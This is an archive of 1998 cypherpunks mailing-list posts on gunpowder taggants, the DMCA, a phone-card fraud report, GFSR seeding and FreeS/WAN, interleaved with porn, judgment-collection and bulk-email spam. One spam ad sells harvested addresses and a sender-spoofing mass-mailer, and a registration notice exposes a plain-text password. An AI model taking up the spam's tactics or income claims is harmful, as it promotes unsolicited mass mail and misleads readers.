Flicitations,  votre abonnement  libre   l'Eureka! le
bulletin  est  maintenant install.  Nous esprons  que
vous  apprciez chaque copie.  Comme promis,  alors que
vous attendez votre premier bulletin ici sont les liens
aux videos LIBRES et aux photos LIBRES!

WILLKOMMEN ZU EUREKA!
=====================
Glckwnsche,   Ihre  freie  Subskription  zum  Eureka!
Rundschreiben wird jetzt oben eingestellt.  Wir hoffen,
da Sie jedes  Exemplar genieen.  Wie, whrend Sie Ihr
erstes Rundschreiben hier warten, sind die Links zu den
FREIEN videos und zu den FREIEN Fotos versprochen! 

RECEPCIN A EUREKA!
===================
Felicitaciones,  su  suscripcin  libre  al  Eureka! el
boletn  de   noticias  ahora  se  fija   para  arriba.
Esperamos  que  usted  goce  de  cada  copia.  Segn lo
prometido,  mientras que usted espera su primer boletn
de noticias aqu son las conexiones a los videos LIBRES
y a las fotos LIBRES!

BENVENUTO A EUREKA!
===================
Congratulazioni,   il  vostro  abbonamento   libero  al
Eureka!  il bollettino  ora  installato.  Speriamo che
godiate ogni copia.  Come promesso, mentre aspettate il
vostro primo bollettino qui sono i collegamenti ai vid-
eos LIBERI ed alle foto LIBERE!

BOA VINDA A EUREKA!
===================
Felicitaes, sua subscrio livre ao Eureka! o boletim
de notcias  ajustado  agora acima.  Ns esperamos que
voc aprece cada cpia.  Como prometidas,  quando voc
esperar seu  primeiro boletim  de notcias aqui  so as
ligaes aos videos LIVRES e s fotos LIVRES!

=======================================================
FREE hardcore videos ........ http://www.slutorama.com/
FREE hardcore photos .... http://209.50.232.36/desires/
=======================================================

The following lines identify the source of this subscription
request,  including date/time,  IP number and  browser used.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Sun, 17 May 1998 17:43:48 -0700 (PDT)
To: "Igor Chudov @ home" <ichudov@algebra.com>
Subject: Re: Gunpowder taggant solution
In-Reply-To: <199805170431.XAA01850@manifold.algebra.com>
Message-ID: <Pine.BSF.3.96.980518031710.20829B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 16 May 1998, Igor Chudov @ home wrote:

> Tim May wrote:
> > * For smokeless powders, i.e., _not_ black powder, the powders are
> > semi-visually recognizable. So Bullseye is noticeably different from Unique
> > and 2400, for example.
> 
> Is mixing them dangerous?

Taggants in gun powder are inherently dangerous. They frequently cause a
loss of stability of the powder.
> > * However, smokeless powders are worthless for bombs. (Black powder is
> > almost worthless, by modern standards. Much easier to make your own
> > plastique.)
> 
> I thought that plastic explosives were hard to make. Is that wrong?

Making plastic explosives is easy. No, I am not going to post the recipe.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka-help@eureka.abc-web.com
Date: Sun, 17 May 1998 21:07:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Successful Subscription
Message-ID: <895464469.18392.ezmlm@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


WELCOME TO EUREKA!
==================
Congratulations,  your free subscription to the Eureka!
newsletter is now set up. We hope you enjoy every copy.
As promised,  while you wait  for your first newsletter
here are the links to  the FREE videos and FREE photos!

BIENVENUE  EUREKA!
===================
Flicitations,  votre abonnement  libre   l'Eureka! le
bulletin  est  maintenant install.  Nous esprons  que
vous  apprciez chaque copie.  Comme promis,  alors que
vous attendez votre premier bulletin ici sont les liens
aux videos LIBRES et aux photos LIBRES!

WILLKOMMEN ZU EUREKA!
=====================
Glckwnsche,   Ihre  freie  Subskription  zum  Eureka!
Rundschreiben wird jetzt oben eingestellt.  Wir hoffen,
da Sie jedes  Exemplar genieen.  Wie, whrend Sie Ihr
erstes Rundschreiben hier warten, sind die Links zu den
FREIEN videos und zu den FREIEN Fotos versprochen! 

RECEPCIN A EUREKA!
===================
Felicitaciones,  su  suscripcin  libre  al  Eureka! el
boletn  de   noticias  ahora  se  fija   para  arriba.
Esperamos  que  usted  goce  de  cada  copia.  Segn lo
prometido,  mientras que usted espera su primer boletn
de noticias aqu son las conexiones a los videos LIBRES
y a las fotos LIBRES!

BENVENUTO A EUREKA!
===================
Congratulazioni,   il  vostro  abbonamento   libero  al
Eureka!  il bollettino  ora  installato.  Speriamo che
godiate ogni copia.  Come promesso, mentre aspettate il
vostro primo bollettino qui sono i collegamenti ai vid-
eos LIBERI ed alle foto LIBERE!

BOA VINDA A EUREKA!
===================
Felicitaes, sua subscrio livre ao Eureka! o boletim
de notcias  ajustado  agora acima.  Ns esperamos que
voc aprece cada cpia.  Como prometidas,  quando voc
esperar seu  primeiro boletim  de notcias aqui  so as
ligaes aos videos LIVRES e s fotos LIVRES!

=======================================================
FREE hardcore videos ........ http://www.slutorama.com/
FREE hardcore photos .... http://209.50.232.36/desires/
=======================================================

The following lines identify the source of this subscription
request,  including date/time,  IP number and  browser used.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 18 May 1998 02:39:58 -0700 (PDT)
To: ichudov@algebra.com>
Subject: RE: Gunpowder taggant solution
Message-ID: <896C7C3540C3D111AB9F00805FA78CE20279C0@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain


> ichudov@algebra.com[SMTP:ichudov@algebra.com]  wrote: 
> 
> Also, a gun owner could simply buy gnu powder in various places and
> mix the batches.

We call it Wildebeeste Powder in this neck of the woods.

If you mix Blue Wildebeeste and Black Wildebeeste you get a virtual
Serengeti. There's a good one in the Natural History Museum in
Kensington. Just next to the Horese Evolution quiz.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Heather Johnson" <88769500@27850.com>
Date: Mon, 18 May 1998 04:49:43 -0700 (PDT)
To: Casey631@hotmail.com
Subject: I heard you wanted my picture..
Message-ID: <199805180718.HAA25658@mailroot.com>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
<HTML><PRE>Here it is!
</PRE></HTML>


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 May 1998 04:28:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto Under Digital Copyright Act
Message-ID: <199805181127.HAA16402@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Congressional Record: May 15, 1998 (Senate)

                    DIGITAL MILLENNIUM COPYRIGHT ACT

  Mr. KYL. Mr. President, I rise today to speak about a section in the
Digital Millennium Copyright Act that I am particularly proud of, and
that is the law enforcement exception in the bill. At the Judiciary
Committee markup, Senator Grassley and I, along with the assistance of
Chairman Hatch and Senator Ashcroft worked to strengthen the law
enforcement exception in the bill. We received input on the language
from the copyright community and the administration: the National
Security Agency (NSA), the Central Intelligence Agency (CIA), the
Departments of Commerce and Justice, and the Office of Management and
Budget (OMB).

  The law enforcement exception ensures that the government continues
to have access to current and future technologies to assist in their
investigative, protective, or intelligence activities. I am concerned
that the tools and resources of our intelligence and law enforcement
communities are preserved--and more importantly, not limited, by
passage of S. 2037. Under that bill, a company who contracts with the
government can continue to develop encryption/decryption devices under
that contract, without having to worry about criminal penalties.

  Because much of our leading technologies come from the private
sector, the government needs to have access to this vital resource for
intelligence and law enforcement purposes.

  The law enforcement exception recognizes that oftentimes governmental
agencies work with non-governmental entities--companies, in order to
have access to and develop cutting edge technologies and devices. Such
conduct should not be prohibited or impeded by this copyright
legislation.

                          ____________________

Digital Millenium Copyright Act:

   http://jya.com/s2037.txt  (162K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: online@cyper-west.com (OnLine Mortgage Corp.)
Date: Mon, 18 May 1998 11:14:29 -0700 (PDT)
To: online@cyper-west.com
Subject: Home Loans on the Net
Message-ID: <199805181264EAA42243@post.cyber-west.com>
MIME-Version: 1.0
Content-Type: text/plain


With intersest rates so low, you might be intersted in obtaining a new Home Loan.

Does your income not quite cover all your needs? Are you left wanting for business needs, home needs, autos, travel, or for any other purpose or do you just want to get out of DEBT? 

Just complete our EASY APPLICATION (http://www.mortgageweb.com/onlea.htm) and we will do a finanical analysis to see how much money you can save each month. Or how much money you can get to be used for any purpose.

You can borrow money for:

Debt Consolidation 
Autos & Boats
Starting a Business
Medical Expenses
Anything you might need

You alone decide how much to borrow and how long to repay the loan. In fact may programs allow you to repay early with no penalty.

So APPLY NOW, you have nothing to lose. In fact if you act within the next 48 hours we will include a free pre-paid calling card with your loan. (http://www.mortgageweb.com/onlea.htm) 

OnLine Mortgage Corporation

************************************************************************************************
We are responsible e-mailers and received information that you might be interested in this program. If this was done in error please accept our appology and hit reply and enter "remove in the heading".
**************************************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Mon, 18 May 1998 09:53:47 -0700 (PDT)
To: Igor Chudov <ichudov@algebra.com>
Subject: Re: Gunpowder taggant solution
In-Reply-To: <199805161952.OAA22508@manifold.algebra.com>
Message-ID: <3560664D.A697C23A@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Igor Chudov @ home wrote:

> Also, a gun owner could simply buy gnu powder in various places and
> mix the batches.

Ayeee!  Just what we needed!  Free Software GnuPowder. :) From the folx
who broght you Emacs. :)

(sorry had to be done!)

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 May 1998 10:37:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: German Phone Cards Hacked
Message-ID: <199805181737.NAA03845@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from Europe:

May 18, 1998

Telephone card fraud in the millions of dollars.

Hackers from the Netherlands have inundated the German market with illegally
recharged telephone cards, causing losses in the several millions of marks
(millions of dollars), stated the weekly Focus, due out Monday.

In breaking the telephone cards' code, the hackers succeeded in recharging
cards emptied of their credit.

The German association of tobacconist wholesalers assesses losses at 60
million marks (33 million dollars), reports Focus.

The con men bought used cards by the thousands from collectors. As a
result, their intitial price of five pfenning (2.7 cents) per card quickly
rose to one mark (55 cents).

According to experts cited by Focus, the recharged cards, which the
pirates resold at a lesser or equivalent price, are impossible to
distinguish from those purchased legitimately.

Card producers intend to stop this illegal commerce thanks to a new software
program allowing used cards to be electronically marked, the weekly believes.

[Translation by DN]

----------

Escroquerie de plusieurs millions de dollars par cartes tlphoniques

Des pirates informatiques nerlandais ont inond le march allemand avec
des cartes tlphoniques recharges illgalement, causant un prjudice
de plusieurs millions de marks (plusieurs millions de dollars), affirme
l'hebdomadaire Focus  paratre lundi.

En forant le systme de codage des cartes tlphoniques, les pirates
ont russi  recharger des cartes vides de leurs units.

L'association allemande des grossistes et dbitants de tabac chiffre le
prjudice  60 millions de marks (33 millions de dollars), rapporte
Focus.

Les escrocs achetaient des cartes usages par milliers auprs de
collectionneurs. Leur prix initial de cinq pfennig (2,7 cents) par carte
est de ce fait rapidement mont  prs d'un mark (55 cents).

Selon des experts cits par Focus, les cartes recharges, que les
pirates revendaient  un moindre prix ou au mme prix, sont impossibles
 diffrencier de celles dment achetes.

Les fabricants de cartes entendent stopper ce commerce illgal grce 
un nouveau programme informatique (software) permettant de marquer
lectroniquement les cartes usages, croit savoir l'hebdomadaire.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Mon, 18 May 1998 13:23:34 -0700 (PDT)
To: lawya@lucs-01.novell.leeds.ac.uk
Subject: National Atomic Museum
Message-ID: <35609809.407F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 5/18/98 1:37 PM

John Young
J Orlin Grabbe

Morales http://jya.com/whpfiles.htm and I had lunch at Wendy's at 11:30.

I read drafts of Morales upcoming filings.  And discussed legal
strategies.

After lunch, I went to the National Atomic Museum on Kirtland AFB.

The museum is across the street from Sandia.

They now charge for admission ... but I made it in for $1 as a senior
citizen.

The museum main hall tour is laid out by history date of radiation.

The self-guided tour gets interesting about the time of Hahn,
Heisenberg,
Fermi, Lawrence, ...  Then it gets into THE BOMB.

Lots of picture of the '50 NTS site explosions.  But as we know from
Carole Gallagher book's American Ground Zero a DOE employee is quoted
"Those Mormons don't give a shit about radiation."

After touring the main hall, I went back to a wall display near the
bathrooms.

There they have a rather-large display on LANL mathematician Stanislas
Ulam.

Ulam's thing was Monte Carlo computations.  These use random or
pseudorandom
numbers.

Ted Lewis told me that they now use the gfsr at LANL for its nuclear
bomb 
simulations.

  http://av.yahoo.com/bin/query?p=gfsr&hc=0&hs=0 

But this is how the mess got started.  Me making contact  with a
Japanese 
professor who developed a new method for selecting the binary seed
matrix
for the gfsr.

I went into the gift shop.

I bought John Young a refrigerator magnet PROUDLY proclaiming

	1945 509th COMPOSITE GROUP 1995

           FIRST ATOMIC BOMBARDMENT

             50th ANNIVERSARY

and Orlin a colorful red and orange postcard which reads on the back

	                       Trinity
	On July 16, 1945 at 5:30 AM, at a site code-named trinity,
	approximately 130 miles south of Albuquerque on White
	Sands Missile Range, the world's first nuclear device was
	exploded.  The explosion, equal to 20,000 tons of TNT, was
	was seen and heard over the entire state of New Mexico.

Great article, Orlin. http://www.aci.net/kalliste/speccoll.htm
Madsen did good too.  http://caq.com/cryptogate

Let's all hope Congress, unlike the bureaucrats, see the merits of
getting 
the requested documents posted on Internet.  And on to settlement of
this 
UNFORTUNATE matter.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 19 May 1998 08:05:24 -0700 (PDT)
To: ajsullivan@att.com
Subject: linux-ipsec: ANNOUNCE:  FreeS/WAN IPSEC & IKE version 0.8 released & useful!
Message-ID: <3.0.5.32.19980518152708.008bdd30@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from linux-ipsec@clinet.fi - posted by Hugh Daniel <hugh@toad.com>
---------------------------------------------------------


  I would like to announce for the FreeS/WAN software team that they
now have a freeswan-0.8 release available for download from the
FreeS/WAN home page at:
	  http://www.xs4all.nl/~freeswan

  The 0.8 (and target 1.0 in June) runs only in a VPN (tunnel) mode,
protecting and encrypting net traffic for a subnet behind the SG.
This setup is called a SG for Security Gateway.  We plan on
implementing the rest of the IPSEC and IKE draft standards in our 2.0
release later this summer for the 2.1.xxx and 2.2.xx series Linux
kernels.

  There is some useful documentation for the current FreeS/WAN done by
Kai Martius at:
    http://www.imib.med.tu-dresden.de/imib/Internet/index.html

  The 0.8 release has been tested extensively in the hand keyed
ESP-3DES-HMAC-MD5-96 tunnel mode and is quite robust.  On a 150Mhz 586
Clone PC TCP throughput is over 320 Kbytes/second sustained as
measured by netperf.
  The IKE daemon pluto has been tested only a very little and
sometimes works and sometimes does not.  It will work for the simple
VPN case before 1.0.

  Feedback, new features, documentation, scripts and bug fixes &
reports are especially useful in the next few weeks before we start in
on the 0.9x series of release working up to a stable 1.0 release in
June.  Don't wait for the last minute to submit that neat feature or
bug fix, as we might not have time to include it!

  If you have questions about the project please see our home page
where you will find a mail list, list archives, FTP directory's etc.
  Thanks to everyone who made this release possible, but mostly the
people who coded it up!

  Please post all bugs, fixes, code etc. to the public email list at
<linux-ipsec@clinet.fi>.

		||ugh Daniel
		hugh@toad.com
			Systems Testing & Project mis-Management
			The Linux FreeS/WAN Project
			http://www.xs4all.nl/~freeswan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@mentat.com (Jim Gillogly)
Date: Mon, 18 May 1998 16:23:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GFSR initialization? [Re: National Atomic Museum]
Message-ID: <9805182322.AA27897@mentat.com>
MIME-Version: 1.0
Content-Type: text/plain


[Bill Payne's's mailing list pruned back to cypherpunks only]
> Ted Lewis told me that they now use the gfsr at LANL for its nuclear
> bomb=20
> simulations.
> 
>   http://av.yahoo.com/bin/query?p=3Dgfsr&hc=3D0&hs=3D0=20
> 
> But this is how the mess got started.  Me making contact  with a
> Japanese=20
> professor who developed a new method for selecting the binary seed
> matrix
> for the gfsr.

Is that to speed it up, so you don't have to initialize it by spinning
through a bunch of initial iterations?  Turns out there's a time-memory
tradeoff, where if you do a recursion relationship on where you want it
to start, you can set it up in log2 time and come out with the same
starting point you would have by spinning: the recursion equations
cancel nicely and it boils down to something manageable.  I think other
people have initialized it with another PRNG with good success.

I <know> that's not classified, since I came up with the recursion
shortly after the Lewis & Payne paper on GFSR came out -- JACM, wasn't
it?  I never got around to writing it up.

	Jim Gillogly
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wopaulai91@yahoo.com
Date: Mon, 18 May 1998 19:14:18 -0700 (PDT)
To: wopaulai91@yahoo.com
Subject: Information  you  requested!
Message-ID: <199805182121RAA19197@us.ibm.net.bmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Thank you for your interest in our training Course.                             

Success Courses  offers an extensive Video Tape training course in "How to Collect Judicial Judgments".


If you are like many people, you are not even sure what a Judicial Judgment is and why processing Judicial Judgments can earn you very substantial income. 


If you ever sue a company or a person and you win then you will have a Judicial Judgment against them.  You are happy you won but you will soon find out the shocking fact:  "Its now up to you to collect on the Judgment".  The court does not require the loser to pay you.  The court will not even help you.  You must trace the loser down,  find their assets,  their employment, bank accounts,  real estate,  stocks and bonds,  etc.   Very few people know how to find these assets or what to do when they are found.  The result is that millions of Judgments are just sitting in files and being forgotten.

"In 79% of the cases the winner of a Judgment never sees a dime."

The non-payment of  judicial debt has grown to epidemic proportions.  Right now in the United States there is between  200 and 300 billion dollars of uncollected Judicial Judgment debt.  For every Judgment that is paid,  5 more Judgments take its place.

We identified this massive market 4 years ago and have actively pursued Judicial Judgments since.  We invented this business. We have perfected it into a well proven and solid profession in which only a select few will be trained in the techniques necessary to succeed in this profession.

With our first hand experience we have built a course which teaches you how to start your business in this new unknown and exciting field of  processing Judicial Judgments.

By following the steps laid out in our course and with reasonable effort you can  become very successful in the processing of Judicial Judgments.

The income potential is substantial in this profession.  We have associates who have taken our course and are now working full time making $96,000.00 to  over $200,000.00 per year.  Part time associates are earning between $24,000.00 and $100,000.00 per year.   Some choose to operate out of their home and work by themselves.  Others build a sizable organization of 15 to 25 people in attractive business offices.


Today Success Courses  and our associates have over 632 million dollars in Judicial Judgments that we are currently processing.  Of this 632 million,  36 million is in the form of joint ventures between our firm  and our associates.  Joint ventures are where we make our  money.  We only break even when our course is purchased.  We make a 12% margin on the reports we supply to our associates.   Our reporting capability is so extensive that government agencies,  police officers,  attorneys,  credit agencies etc.  all come to us for reports.


Many of our associates already have real estate liens in force of between 5 million to over 15 million dollars.  Legally this means that when the properties are sold or refinanced our associate must be paid off.  The norm is 10% interest compounded annually on unpaid Judicial Judgments.  Annual interest on 5 million at 10%  translates to $500,000.00 annually in interest income,  not counting the payment of the principle.  Our associates earn half of this amount or $250,000.00 per year.  This is just for interest,  not counting principle and not counting the compounding of the interest which can add substantial additional income.  Typically companies are sold for 10 times earnings.  Just based on simple interest an associate with 5 million in real estate liens could sell their business for approximately 2.5 million dollars.


92% of all of our associates work out of their home;  43% are women and 36% are part time.   


One of the benefits of working in this field is that you are not under any kind of  time frame.  If you decide to take off for a month on vacation then go.  The Judgments you are working on will be there when you return.   The Judgments are still in force,  they do not disappear.



The way we train you is non-confrontational. You use your computer and telephone to do most of the processing. You never confront the debtor.  The debtor doesn't know who you are.  You are not a collection agency.


Simply stated the steps to successful Judicial Processing are as follows: 


 Mail our recommended letter to companies and individuals with Judicial Judgments.  (We train you how to find out who to write to)


 8% to 11% of the firms and people you write will call you and ask for your help.  They call you,  you don't call them unless you want to.


 You send them an agreement (supplied in the course) to sign which splits every dollar you collect 50% to you and 50% to them.  This applies no matter if the judgment is for $2,000.00 or $2,000,000.00. 


 You then go on-line to our computers to find the debtor and their assets.  We offer over 120 powerful reports to assist you.  They range from credit reports from all three credit bureaus,  to bank account locates,  employment locates,  skip traces and locating stocks and bonds,  etc.  The prices of our reports are very low.  Typically 1/2 to 1/3 of what other firms charge.   For example we charge $6.00 for an individuals credit report when some other companies charge $25.00.


 Once you find the debtor and their assets you file garnishments and liens on the assets you have located.  (Standard fill in the blanks  forms are included in the course)


 When you receive the assets you keep 50% and  send 50% to the original Judgment holder.


 Once the Judgment is fully paid you mail a Satisfaction of Judgment to the court. (Included in the course)

Quote's  from several of our students:


Thomas in area code 516 writes us:  "I just wanted to drop you a short note thanking you for your excellent course.  My first week,  part time,  will net me 3,700.00 dollars.  Your professionalism in both the manual and the video opened doors for me in the future.  There's no stopping me now.  As of February 3rd, 1995, Thomas states he has over $8,500,000 worth of judgments he is working on.


After only having this course for four months,  Larry S. in area code 314  stated to us:  "I am now making $2,000.00 per week and expect this to grow to twice this amount within the next year.  I am having a ball.  I have over $250,000 in judgments I am collecting on now."


After having our course for 7 months Larry S. in 314 stated "I am now making $12,000.00 per month and have approximately $500,000.00  in judgments I am   collecting on.  Looks like I will have to hire someone to help out"


Marshal in area code 407 states to us  "I feel bad,   you only charged me $189.00 for this course and it is a gold mine. I  have added 3 full time people to help  me after only having your course for 5 months"


If the above sounds interesting to you then its time for you to talk to a real live human being,  no cost or obligation on your part.


Please call us at Area Code 2 5 3 then 8 6 3--5 5 2 2.  We have Customer Support staff available to you from 8:00AM to 7:00PM (Pacific Time) Monday through Saturday.  Closed Sunday.  If you call this number you can talk to one of our experienced Customer Support personnel. They can answer any questions you may have - with no obligation. Sometimes we run special pricing on our courses and combinations of courses. When you call our  Customer Support line they can let you know of any specials we may be running. If you like what you read and hear about our courses, then the Customer Support person can work with you to place your order. We are very low key. We merely give you the facts and you can then decide if you want to work with us or not.


>From the above information and actual results you can see why we can state the following:


With our course you can  own your own successful business.  A business which earns you substantial income now and one which could be sold in 3-5 years,  paying you enough to retire on and travel the world.  A business which is extremely interesting to be in.  A Business in which every day is new and exciting.  None of your days will be hum drum.  Your brain is challenged.   A business which protects you from Corporate downsizing.  A business which you can start part time from your home and later,  if you so desire,  you can work in full time.  A business which is your ticket to freedom from others telling you what to do.  A business which lets you control your own destiny.  Our training has made this happen for many others already.   Make it happen for you!

Thank you for your time and interest.





 24mx58.10gr.1




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Mon, 18 May 1998 13:31:35 -0700 (PDT)
To: John Young <jya@pipeline.com>
Subject: Re: Crypto Under Digital Copyright Act
In-Reply-To: <199805181127.HAA16402@camel8.mindspring.com>
Message-ID: <Pine.BSF.3.96.980518230647.22880A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 May 1998, John Young wrote:

> Congressional Record: May 15, 1998 (Senate)
> 
>                     DIGITAL MILLENNIUM COPYRIGHT ACT
> 
>   Mr. KYL. Mr. President, I rise today to speak about a section in the
> Digital Millennium Copyright Act that I am particularly proud of, and
> that is the law enforcement exception in the bill.

Yup. Reverse engineer a cipher, go to jail. Seems future security analysis
of ciphers will have to be released anonymously from Tonga.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 9086097@6urt6ijratr.com
Date: Tue, 19 May 1998 01:26:20 -0700 (PDT)
To: .WHUD
Subject: 40 MILLION EMAIL ADDRESSES CHEAP PRICE!!!
Message-ID: <199805190826.BAA22562@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


40 MILLION EMAILS FOR SALE  super low price!

Our Fresh Addresses Will Bring You 
Incredible Results!


http://207.93.198.154/webhost

If you REALLY want to get the word out regarding
your services or products, Bulk Email is the BEST 
way to do so, PERIOD! Advertising in newsroups is 
good but you're competing with hundreds even THOUSANDS
of other ads. Will your customer's see YOUR ad in the 
midst of all the others?

Bulk Email will allow you to DIRECTLY contact your
potential customers. They are much more likely to
take the time to read about what you have to offer 
if it was as easy as reading it via email rather
than searching through countless postings in 
newsgroups.

There is a secret to effective Bulk Email...HIGH
QUALITY LISTS! There are SO many companies offering 
bulk email lists that are months old and it's not
uncommen for HALF of those addresses to be outdated
and undeliverable. Also, most companies offer lists
that they have compiled from addresses extracted from
newsgroups, THE WORST PLACE TO GET ADDRESSES FROM!

Why? Simple, most people that post messages in news-
groups KNOW that their addresses might be extracted
so they use FAKE addresses resulting in undeliverable
messages.

You can now get FRESH, HIGH QUALITY lists of addresses
that have NOT been extracted from newsgroups! Our lists
are compiled of addresses that we have extracted from 
member directories and help forums where you CAN NOT
use fake email addresses! Also, our lists are LESS than
1 month old and are CONSTANTLY updated to remove dupes
and undeliverables! 

Our emails can be downloaded at a web site or be shipped to your home in disks.  Our emails are in text 
form, one line per email.  This form is compatible with Pegasus, Eudora, Microsoft email programs, and 
many other popular email softwares. 

We believe that if you have a great product or service for everyone, you should let everyone know.  Do it 
cost effectively today!  Sending emails doesn't cost you one cent!  In just one night, millions of people will 
know about your company or your corporation.  Market your company by reaching 40,000,000 (40 million) 
fresh customers for only $79.00!!!!


Special Sale!  Buy the 40 Million email addresses today and receive Email Platinum Professional Version 
FREE! Email Platinum Pro is 4 programs in one!  (This message is sent by Email Platinum.  You can too send 
out mass sales letters professionally.)

Email Platinum is an extremely fast mass emailer (150,000 emails per hour with modest Pentium) that does 
four things:

1) Collects email addresses from newsgroups, web sites, or from AOL member files by key words and by 
specific interests.
2) Mail out your sales letters with automated friendly addressing (example: Dear John, Dear Nancy, etc.) 
Ramdomizes from and to field.  One push of a button does it all. Guarantee no cut and paste.
3) Have capability to remove email addresses of people who don't like emails.
4) Post your sales letters to THOUSANDS OF NEWSGROUPS WITH A PUSH OF A BUTTON --- within HALF 
AN HOUR!!

Email Platinum and Email Addresses are your best sales tools! If you have a good product, you will be rich 
in no time.

Call today (415)585-3825.  All for $79. Not a penny extra.

Call today (415)585-3825.  Technical support available 24 hours. Emails are updated regularly. 

We can accept Visa or Master Card. 


http://207.93.198.154/webhost

Or, simply print this form and fill it out.  Mail it along with $79 check or money order to:

Alex Chiu
PO BOX 16547
San Francisco CA  94116
(415) 585-3825

Upon the receipt of your payment, you will immediately be instructed via email or by phone on how to 
download the fresh email addresses.


Name: _________________________________

Address: ________________________________________

_________________________________________________

Telephone number: ___________________________

Email address: ______________________________

-----------------------------------------------------

------------------------------------------------------

Don't want to email millions of people yourself?  No problem.  I can do it for you professionally!  I mail out 
two million emails for you within 3 days for $129!!  Tell me what kind of customer you would want, and I 
will set the target with my highly targeted list.  A mere $129 service includes:

Email two million people. (targeted prospects)
Post advertisement on 2000 newsgroups.
telephone recommendations and technical support on how to make money on the internet.

I guarantee you this is a great way to start your own company on the internet.  Few months later, you will 
be like me making $5000 a month with internet!  Call (415) 585-3825 if you have any question.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: www@dejanews.com
Date: Tue, 19 May 1998 02:40:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deja News Registration Confirmation
Message-ID: <199805190939.EAA21236@x5.dejanews.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to My Deja News!

You have registered for My Deja News using the email address:
cypherpunks@toad.com. If you did not register for My Deja News, 
please ignore this message.

To enable you to post messages on Deja News, we must confirm 
your email address. This allows us to minimize "spam" and other
problems. To confirm your email address, visit the following Web
page:

http://www.dejanews.com/ec.xp/Z9601d5cf485376063bac83214984f531fd6293a

If your email software supports it, you can simply click on the
link. Since this Web page address (URL) is quite lengthy, however,
you may find it necessary to copy the entire URL and paste it into
your Web browser.

As a reminder, your username is bsphynx and your password 
is sphynx.  You may wish to keep this email to refer to in 
case you forget.

If you have any questions about My Deja News, please refer to the
Help page at http://www.dejanews.com/help/help_regstr.shtml

Thanks,
Deja News




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 May 1998 04:39:44 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: German Phone Cards Hacked
In-Reply-To: <199805181737.NAA03845@camel8.mindspring.com>
Message-ID: <199805191139.HAA15263@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


See English version of German article yesterday on Dutch 
hack of phone cards:

   http://jya.com/card-less.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 19 May 1998 04:57:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: G8 on High Tech Crime
Message-ID: <199805191157.HAA20483@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Ross Anderson and Ulf Mller have provided URLs
for the recent communique from the Brimingham G8 
summit on "principles and action plan" for fighting 
high tech crime:

   http://jya.com/g8crime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adults Only <postmaster@xxxmail.net>
Date: Tue, 19 May 1998 20:49:29 -0700 (PDT)
To: adult4@xxxmail.net
Subject: http://www.scarlett.net/starter
Message-ID: <3.0.3.32.19980519091310.00a09b80@208.15.12.231>
MIME-Version: 1.0
Content-Type: text/plain


